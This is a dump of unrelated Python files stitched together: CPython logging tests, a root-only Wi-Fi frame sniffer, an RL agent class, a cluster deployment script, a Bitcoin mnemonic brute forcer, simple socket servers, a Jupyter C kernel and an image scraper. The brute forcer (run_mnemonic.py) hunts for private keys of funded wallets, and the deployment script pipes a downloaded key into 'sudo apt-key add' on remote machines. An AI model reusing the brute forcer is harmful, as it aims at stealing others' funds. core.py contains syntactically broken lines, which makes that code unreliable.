# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
sniffer.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import pwd
import sys
# import curses
import random
import signal
from loguru import logger
from functools import wraps
from scapy.all import *
import pyric.pyw as pyw
from boop.lib import *
from boop.lib.types import *
from boop.lib.channels import *
from boop.lib.network import Network
from boop.lib.d11_frame import Dot11Frame
class BadInterface(Exception):
def __init__(self, message):
super().__init__(message)
class Sniffer:
def __init__(self, interface: str, channel, target=None, verbose=1):
if not verbose:
logger.disable("boop.lib.sniffer")
if not ROOT:
raise OSError(f"User {pwd.getpwuid(os.getuid())[0]} is not root")
if interface not in MWINTERFACES:
if interface in INTERFACES:
raise BadInterface(
f"Interface {interface} exists but is not in the correct mode"
)
else:
raise BadInterface(f"{interface} is not a valid interface.")
self.interface = interface
self.channel = channel
self.handler_map = {
0: {
0: [self.ASSOC_REQ],
1: [self.ASSOC_RESP],
2: [self.REASSOC_REQ],
3: [self.REASSOC_RESP],
4: [self.PROBE_REQ],
5: [self.PROBE_RESP],
8: [self.BEACON],
9: [self.ATIM],
10: [self.DISASSOC],
11: [self.AUTH],
12: [self.DEAUTH] # 13: ACTION, 14: NO_ACTION
},
1: {
# 7: CTRL, 8: BLOCK_ACK_REQUEST, 9: BLOCK_ACK
10: [self.POLL],
11: [self.RTS],
12: [self.CTS],
13: [self.ACK],
14: [self.CFEND],
15: [self.CFECFA]
},
2: {
0: [self.DATA_PARSER],
1: [self.DATA_PARSER],
2: [self.DATA_PARSER],
3: [self.DATA_PARSER],
4: [self.DATA_PARSER],
5: [self.DATA_PARSER],
6: [self.DATA_PARSER],
7: [self.DATA_PARSER],
8: [self.DATA_PARSER],
9: [self.DATA_PARSER],
10: [self.DATA_PARSER],
11: [self.DATA_PARSER],
12: [self.DATA_PARSER],
}}
self.printer = printer
self.filter = f"ether host {target}" if target else None
self.sniffer_map = {"AP": {}, "CL": {}, "UCL": {}}
self.hidden = []
self.packets = 0
if __debug__:
logger.info(f"Sniffer Created on {interface}")
def __str__(self) -> str:
return f"Sniffer({self.interface})"
def __repr__(self) -> str:
return self.__str__()
def handler(self, packet_type):
@wraps(packet_type)
def __handle(func):
self.handler_map[packet_type[0]][packet_type[1]].append(func)
if __debug__:
logger.info(
f"Handler set for: {packet_type[0]}:{packet_type[1]}"
)
return func
return __handle
def router(self, pkt):
self.packets += 1
try:
self.df = Dot11Frame(pkt)
funcs = [x for x in self.handler_map[pkt.type][pkt.subtype]]
funcs[0](self.df)
for func in funcs[1:]:
func(self, self.df)
except KeyError:
pass
return
def run(self):
if not self.channel:
hop_thread = Thread(target=self.hopper)
hop_thread.daemon = True
hop_thread.start()
else:
interface = pyw.getcard(self.interface)
set_channel(interface, int(self.channel))
printer_thread = Thread(target=self.printer, args=(self,))
printer_thread.daemon = True
printer_thread.start()
sniff(
iface=self.interface, filter=self.filter, prn=self.router, store=0
)
def hopper(self):
interface = pyw.getcard(self.interface)
while True:
channel = random.choice(TWOHERTZ)
# print("channel", channel)
set_channel(interface, channel)
self.channel = channel
time.sleep(4.5)
def ap(self, mac):
# print(self.sniffer_map["AP"].get(mac, None))
return self.sniffer_map["AP"].get(mac, None)
def client(self, mac):
# print(self.sniffer_map["CL"].get(mac, None))
return self.sniffer_map["CL"].get(mac, None)
def ASSOC_REQ(self, dframe): pass
def ASSOC_RESP(self, dframe): pass
def REASSOC_REQ(self, dframe): pass
def REASSOC_RESP(self, dframe): pass
def PROBE_REQ(self, dframe): pass
def PROBE_RESP(self, dframe): pass
def BEACON(self, dframe):
dframe.network_stats()
if self.ap(dframe.src):
self.sniffer_map["AP"][dframe.src].signal = dframe.signal
self.sniffer_map["AP"][dframe.src] + 1
else:
# print(dframe.ssid)
self.sniffer_map["AP"][dframe.src] = Network(
dframe.ssid,
dframe.security,
dframe.cipher,
dframe.channel,
dframe.src,
dframe.src_vendor,
dframe.signal,
dframe
)
def ATIM(self, dframe): pass
def DISASSOC(self, dframe): pass
def AUTH(self, dframe): pass
def DEAUTH(self, dframe): pass
def POLL(self, dframe): pass
def RTS(self, dframe): pass
def CTS(self, dframe): pass
def ACK(self, dframe): pass
def CFEND(self, dframe): pass
def CFECFA(self, dframe): pass
def DATA_PARSER(self, dframe): pass
def set_channel(card, channel, sock=None):
while True:
try:
pyw.chset(card, channel, None, nlsock=sock)
return
except Exception as e:
logger.error(e)
time.sleep(1)
def printer(self):
while True:
print(self.packets)
for network in self.sniffer_map["AP"].values():
# print(network.mSSID, type(network.mSSID))
sys.stdout.write(
" {0}{1}{2}{3:<5}{4}{5:<5}{6:<8}{7}\n".format(
network.mMAC.ljust(19, " "),
network.mEnc.ljust(10, " "),
network.mCipher.ljust(11, " "),
str(network.mCh),
network.mVen.ljust(10, " "),
network.mSig,
network.mBeacons,
network.mSSID
)
)
time.sleep(10)
def signal_handler(sig, frame):
# curses.curs_set(True)
print("\n\n[+] SIGINT RECIEVED...\n")
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
|
core.py
|
import logging
from threading import Thread
import gym
from gym.wrappers import Monitor
import chi
import tensortools as tt
from chi_rl import get_wrapper
from tensortools.util import output_redirect
from time import time
import numpy as np
class Agent:
def __init__(self, generator, name=None, logdir=None):
self.logdir = logdir
self.name = name
self.logger = logging.getLogger(self.name)
handler = logging.FileHandler(logdir + '/logs/' + self.name) if logdir else logging.StreamHandler()
self.logger.addHandler(handler)
self.gen = generator
self.gen.send(None)
def run(self, env, episodes=100000000, async=False):
if async:
t = Thread(target=self.run, args=(env, episodes),
daemon=True, name=self.name)
t.start()
return
with output_redirect(self.logger.info, self.logger.error):
monitor = get_wrapper(env, gym.wrappers.Monitor)
tick = time()
for ep in range(episodes):
self.run_episode(env)
logi = 5
if ep % logi == 0 and monitor:
assert isinstance(monitor, Monitor)
at = np.mean(monitor.get_episode_rewards()[-logi:])
ds = sum(monitor.get_episode_lengths()[-logi:])
dt = time() - tick
tick = time()
self.logger.info(f'av. return {at}, av. fps {ds/dt}')
def run_episode(self, env: gym.Env):
meta_wrapper = get_wrapper(env, .wrappers.Wrapper)
done = False
ob = env.reset()
a, meta = self.act(ob)
rs = []
while not done:
if meta_wrapper:
meta_wrapper.set_meta(meta) # send meta information to wrappers
ob, r, done, info = env.step(a)
a, meta = self.act(ob, r, done, info)
rs.append(r)
return sum(rs)
def act(self, *args) -> tuple:
if not self.gen:
self.gen = self.action_generator()
self.gen.send(None)
args = args[0] if len(args) == 1 else args
r = self.gen.send(args)
r = r or (None, {})
return r
def action_generator(self):
pass
|
EnvSetup.py
|
#!/usr/bin/env python
import os
import paramiko
import argparse
import subprocess
import time
import threading
#Constants
RemoteHomeDir = "/users/nigo9731/"
RemoteDir = "/users/nigo9731/Test/"
RemoteUser = "nigo9731"
LibPath = "/usr/local/lib/"
def scp(direction, localFile, user, server, path):
if direction == True:
os.system("scp " + localFile + " " + user + "@" + server + ":" + path)
else:
os.system("scp " + user + "@" + server + ":" + path + " " + localFile)
def runSSHCommand(server, username, command):
client = paramiko.client.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(server, username=username)
stdin, stdout, stderr = client.exec_command(command)
stdoutAsString = []
stderrAsString = []
for line in stdout:
stdoutAsString.append(line)
for line in stderr:
stderrAsString.append(line)
return stdoutAsString, stderrAsString
def scpLibrary(server, username):
scp(True, "/usr/lib/x86_64-linux-gnu/libtbb*", username, server, RemoteHomeDir)
scp(True, LibPath + "libbtree*", username, server, RemoteHomeDir)
scp(True, LibPath + "librtree*", username, server, RemoteHomeDir)
scp(True, LibPath + "libdtranx*", username, server, RemoteHomeDir)
runSSHCommand(server, username, "sudo mv "+RemoteHomeDir+ "libtbb* /usr/lib/")
runSSHCommand(server, username, "sudo mv "+RemoteHomeDir+ "libbtree* /usr/local/lib/")
runSSHCommand(server, username, "sudo mv "+RemoteHomeDir+ "librtree* /usr/local/lib/")
runSSHCommand(server, username, "sudo mv "+RemoteHomeDir+ "libdtranx* /usr/local/lib/")
def runBash(command):
out, err = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
return out
def RunHyperdex(ip, RemoteUser):
print runSSHCommand(ip, RemoteUser, " wget -O - http://ubuntu.hyperdex.org/hyperdex.gpg.key | sudo apt-key add -; ")
print scp(True, "./hyperdex.list", RemoteUser, ip, "/users/nigo9731/Test/")
print runSSHCommand(ip, RemoteUser, " sudo mv /users/nigo9731/Test/hyperdex.list /etc/apt/sources.list.d/;")
print runSSHCommand(ip, RemoteUser, " sudo apt-get update; sudo apt-get -y install hyperdex-warp libhyperdex-client-dev-warp python-hyperdex-client-warp vim sysstat mutrace valgrind")
# the following are for running the hyperdex
#print runSSHCommand(ip, RemoteUser, "mkdir ~/Test/hyperdex; hyperdex daemon -f --listen="+ip+" --listen-port=7778 --coordinator=128.104.222.31 --coordinator-port=7777 --data=/users/nigo9731/Test/hyperdex &> ~/Test/hyperdex.output &")
#print runSSHCommand(ip, RemoteUser, "rm -rf ~/Test/hyperdex*")
def WaitForThreads(threads):
while True:
deleted_threads = []
for thread in threads:
if thread.isAlive() == False:
thread.join()
deleted_threads.append(thread)
for thread in deleted_threads:
threads.remove(thread)
if len(threads) == 0:
break;
time.sleep(5)
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
runtime_parser = subparsers.add_parser('run', help='deployment for runtime environment')
runtime_parser.set_defaults(subcommand='run')
runtime_parser.add_argument("-c","--cluster",dest="cluster",help="cluster config file required for vm mode: ip list", required = True)
runtime_parser.add_argument("-j","--job",dest="job",help=
"job type: \n"
"lib(install libraries);\n"
"hyperdex(install hyperdex);\n"
"bench(copy benchmark related files);\n"
"helper(run a command in each node)", required = True)
runtime_parser.add_argument("-o","--other",dest="other", help=
"for bench, specify the dtranx cluster size for generating ips file(default: every node in the cluster)")
args = parser.parse_args()
if args.subcommand == 'run':
ips = []
f = open(args.cluster,'r')
for line in f:
ips.append(line.strip())
print ips
if args.job == "lib":
#install dynamic library
threads = []
for ip in ips:
print ip
thread = threading.Thread(target = scpLibrary, args = (ip,RemoteUser,))
thread.start()
threads.append(thread)
WaitForThreads(threads)
elif args.job == "hyperdex":
bash ="\
echo deb [arch=amd64] http://ubuntu.hyperdex.org trusty main >> ./hyperdex.list;"
runBash(bash)
threads = []
for ip in ips:
print ip
thread = threading.Thread(target = RunHyperdex, args = (ip,RemoteUser,))
thread.start()
threads.append(thread)
WaitForThreads(threads)
runBash("rm ./hyperdex.list")
elif args.job == "bench":
baseIP = "192.168.0."
index = 0
localipsFile = open('localips', 'w')
try:
clusterSize = int(args.other)
except:
print "input cluster size as the -o option to generate ips for benchmark tests"
exit()
for i in range(clusterSize):
index = index + 1
localipsFile.write(baseIP + str(index) + '\n')
localipsFile.close();
for ip in ips:
print ip
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/ycsbc", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/Scripts/HashGenerator", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/Scripts/InitializeHyperdex.py", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/workloads/workloaddtranx.spec", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/workloads/workloadbtree.spec", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/YCSB-C-DTranx/workloads/workloadrtree.spec", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/Scripts/metric/monitor.sh", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/Scripts/metric/process.sh", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/DTranx/Build/Example/Tranx/CreateSnapshot", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "/home/neal/Documents/dev/DTranx/Build/Example/Tranx/RunMetis", RemoteUser, ip, "/users/nigo9731/")
print scp(True, "localips", RemoteUser, ip, "/users/nigo9731/ips")
runBash("rm localips");
|
run_mnemonic.py
|
# Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
import multiprocessing
import bitcoinlib
import plutus
import oldKeyGen
import newKeyGen
def main(database):
print('Working...')
while True:
# Mnemonic
words = bitcoinlib.mnemonic.Mnemonic().generate()
key = bitcoinlib.keys.HDKey().from_passphrase(words)
private = str(key)
public = key.public()
plutus.process(private, public, key.address(), database, words)
plutus.process(private, public, key.address_uncompressed(), database, words)
if __name__ == '__main__':
database = plutus.read_database()
# for cpu in range(multiprocessing.cpu_count()):
# for cpu in range(1):
# multiprocessing.Process(target=main, args=(database, )).start()
main(database)
|
server_request_header.py
|
'''
A HTTP server
1. create a socket
2. bind & reuse addr
3. listen
4. while True:
4.1 accept
4.2 new client comes=> create a new process to handle it
'''
import socket
import multiprocessing
def handle_client(client_socket,client_addr):
'''
A function that handles the client's request
1. recv
2. deal with the message(write the http request header to the "1.txt")
3. send back
'''
while True:
recv_data=client_socket.recv(1024)
with open('http_request_header.txt','wb') as f:
f.write(recv_data)
print(recv_data)
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
s.bind(('127.0.0.1',2333))
s.listen(100)
while True:
client_socket,client_addr=s.accept()
p = multiprocessing.Process(target=handle_client,args=[client_socket,client_addr])
p.start()
client_socket.close()
|
kernel.py
|
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
import subprocess
import tempfile
import os
import os.path as path
class RealTimeSubprocess(subprocess.Popen):
"""
A subprocess that allows to read its stdout and stderr in real time
"""
def __init__(self, cmd, write_to_stdout, write_to_stderr):
"""
:param cmd: the command to execute
:param write_to_stdout: a callable that will be called with chunks of data from stdout
:param write_to_stderr: a callable that will be called with chunks of data from stderr
"""
self._write_to_stdout = write_to_stdout
self._write_to_stderr = write_to_stderr
super().__init__(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
self._stdout_queue = Queue()
self._stdout_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stdout, self._stdout_queue))
self._stdout_thread.daemon = True
self._stdout_thread.start()
self._stderr_queue = Queue()
self._stderr_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stderr, self._stderr_queue))
self._stderr_thread.daemon = True
self._stderr_thread.start()
@staticmethod
def _enqueue_output(stream, queue):
"""
Add chunks of data from a stream to a queue until the stream is empty.
"""
for line in iter(lambda: stream.read(4096), b''):
queue.put(line)
stream.close()
def write_contents(self):
"""
Write the available content from stdin and stderr where specified when the instance was created
:return:
"""
def read_all_from_queue(queue):
res = b''
size = queue.qsize()
while size != 0:
res += queue.get_nowait()
size -= 1
return res
stdout_contents = read_all_from_queue(self._stdout_queue)
if stdout_contents:
self._write_to_stdout(stdout_contents)
stderr_contents = read_all_from_queue(self._stderr_queue)
if stderr_contents:
self._write_to_stderr(stderr_contents)
class CKernel(Kernel):
implementation = 'jupyter_c_kernel'
implementation_version = '1.0'
language = 'c'
language_version = 'C11'
language_info = {'name': 'c',
'mimetype': 'text/plain',
'file_extension': 'c'}
banner = "C kernel.\n" \
"Uses gcc, compiles in C11, and creates source code files and executables in temporary folder.\n"
def __init__(self, *args, **kwargs):
super(CKernel, self).__init__(*args, **kwargs)
self.files = []
mastertemp = tempfile.mkstemp(suffix='.out')
os.close(mastertemp[0])
self.master_path = mastertemp[1]
filepath = path.join(path.dirname(path.realpath(__file__)), '..', 'resources', 'master.c')
subprocess.call(['gcc', filepath, '-std=c11', '-rdynamic', '-ldl', '-o', self.master_path])
def cleanup_files(self):
"""Remove all the temporary files created by the kernel"""
for file in self.files:
os.remove(file)
os.remove(self.master_path)
def new_temp_file(self, **kwargs):
"""Create a new temp file to be deleted when the kernel shuts down"""
# We don't want the file to be deleted when closed, but only when the kernel stops
kwargs['delete'] = False
kwargs['mode'] = 'w'
file = tempfile.NamedTemporaryFile(**kwargs)
self.files.append(file.name)
return file
def _write_to_stdout(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stdout', 'text': contents})
def _write_to_stderr(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stderr', 'text': contents})
def create_jupyter_subprocess(self, cmd):
return RealTimeSubprocess(cmd,
lambda contents: self._write_to_stdout(contents.decode()),
lambda contents: self._write_to_stderr(contents.decode()))
def compile_with_gcc(self, source_filename, binary_filename):
args = ['gcc', source_filename, '-std=c11', '-fPIC', '-shared', '-rdynamic', '-o', binary_filename]
return self.create_jupyter_subprocess(args)
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
with self.new_temp_file(suffix='.c') as source_file:
source_file.write(code)
source_file.flush()
with self.new_temp_file(suffix='.out') as binary_file:
p = self.compile_with_gcc(source_file.name, binary_file.name)
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0: # Compilation failed
self._write_to_stderr(
"[C kernel] GCC exited with code {}, the executable will not be executed".format(
p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [],
'user_expressions': {}}
p = self.create_jupyter_subprocess([self.master_path, binary_file.name])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0:
self._write_to_stderr("[C kernel] Executable exited with code {}".format(p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}
def do_shutdown(self, restart):
"""Cleanup the created source code files and executables when shutting down the kernel"""
self.cleanup_files()
|
baiduimagedownload.py
|
# coding:utf-8
# python 2.7.5
#
# 获取一些百度图片
# 1.指定标签
# 2.
# http://image.baidu.com/channel/listjson?pn=0&rn=1000&tag1=%E6%98%8E%E6%98%9F&tag2=%E5%BC%A0%E5%AD%A6%E5%8F%8B&ftags=&sorttype=0&ie=utf8&oe=utf-8&image_id=692147105
# 这是获取列表的方式
# pn 分页标识
# rn 页面内图片数量
# tag1 主标签
# tag2 分标签
# 其他字段暂时不管
#
# 3.返回的内容json 转字典
# 4.取download_url就可以了
# 5.下载
# 6.多线程加快点效率
from urllib import urlretrieve, urlcleanup
from urllib2 import *
import json
from hashlib import md5
import sys
class Baiduimage():
"""
"""
def __init__(self, tag1, tag2, number=1, stored="."):
self.tag1 = tag1
self.tag2 = tag2
self.number = str(number)
self.url = self.make_url()
self.stored = stored
print "work start"
def make_url(self):
url = "http://image.baidu.com/channel/listjson?pn=0&rn=" + self.number + "&tag1=" + self.tag1 + "&tag2=" + self.tag2 + "&ftags=&sorttype=0&ie=utf8&oe=utf-8"
return url
def request_body(self):
request = Request(self.url)
# request.add_header();
r = urlopen(request)
return r.read()
def parse_body(self):
jsonstr = json.loads(self.request_body())
urls = [i['download_url'] for i in jsonstr['data'] if i.has_key('download_url')]
return (urls, urls.__len__())
def image_name(self, url):
return self.stored + "/" + md5(url).hexdigest() + "." + url.split(".")[-1]
def dowload_image(self):
(urls, urlnumber) = self.parse_body()
def dowload(url):
try:
urlretrieve(url, self.image_name(url))
urlcleanup()
except:
return False
return True
print "want " + self.number + " images, get images links " + str(urlnumber)
if urlnumber == 0:
print "Could not find a image link"
pass
else:
print "Download start press Ctrl+Break to stop "
count = 0
for id, i in enumerate(urls):
if dowload(i):
count += 1
sys.stdout.write("Dowdload[" + str(id + 1) + "] has download " + str(count) + chr(8) * 80)
sys.stdout.flush()
print "\nwork end"
def dowload_image_thread(self, threadnumber=2):
"""
"""
(urls, urlnumber) = self.parse_body()
print "Download start press Ctrl+Break to stop "
def dowload(url):
try:
urlretrieve(url, self.image_name(url))
urlcleanup()
except:
return False
return True
from Queue import Queue
from threading import Thread
from itertools import count
def worker(count=count()):
while True:
(id, item) = q.get()
if dowload(item):
sys.stdout.write("Dowdload[" + str(id + 1) + "] has download " + str(next(count) + 1) + chr(8) * 80)
sys.stdout.flush()
q.task_done()
q = Queue()
for i in range(threadnumber):
t = Thread(target=worker)
t.daemon = True
t.start()
for id, item in enumerate(urls):
q.put((id, item))
q.join() # block until all tasks are done
print "work end"
if __name__ == "__main__":
print "this is a test with thread "
Baiduimage("明星", "刘德华", 100).dowload_image_thread() # 自定义分类 关键词 图片个数 存放路径
|
manager_godbless.py
|
"""
This is the client file for part1.
You can input texts to send to the server and then the server
will echo the message back.
author: Yuhang Sun
assignment: PA1
"""
# !pip install torch
import socket
from threading import Thread
from PIL import Image
import torchvision.transforms as transforms
g_socket = None
g_conn_pool = []
g_conn_use = []
def get_image():
img = Image.open('images/dog.jpeg').convert('RGB')
img = transforms.ToTensor()(img)
row = img.shape[1]
column = img.shape[2]
ss = "1 " + str(row) + " " + str(column) + " "
img_numpy = img.numpy().flatten()
for num in img_numpy:
ss += str(num) + ' '
return ss
def handle_client():
while True:
client, addr = g_socket.accept()
print(addr)
g_conn_pool.append(client)
g_conn_use.append(False)
def handle_send_image(client, ind):
msg = get_image()
print(">>> Sending the image..")
msg += "\n"
client.send(msg.encode("utf-8"))
print(">>> Finish sending.")
# receive the feedback from the server
msg = ""
while True:
feedback = client.recv(1024)
if msg == "404":
raise Exception
msg += feedback.decode("utf-8")
if msg[-1] == '\n':
break
print(">>> Receive from the client: " + msg)
g_conn_use[ind] = False
def main():
global g_socket, g_conn_pool
g_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
g_socket.bind(('DESKTOP-3N4U79Q', 2888))
g_socket.listen(5)
print("服务端已启动,等待客户端连接...")
t = Thread(target=handle_client)
t.setDaemon(True)
t.start()
while True:
cmd = input("请输入操作:")
if cmd == '':
continue
if int(cmd) == 1:
print("当前已连接worker:", len(g_conn_pool))
for i in range(len(g_conn_pool)):
if not g_conn_use[i]:
print(">>> Use worker " + str(i + 1))
g_conn_use[i] = True
t = Thread(target=handle_send_image, args=(g_conn_pool[i], i))
t.setDaemon(True)
t.start()
break
if cmd == 'exit':
exit()
if __name__ == '__main__':
main()
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import configuration as conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException
from airflow.models import DagRun, SlaMiss, errors
from airflow.stats import Stats
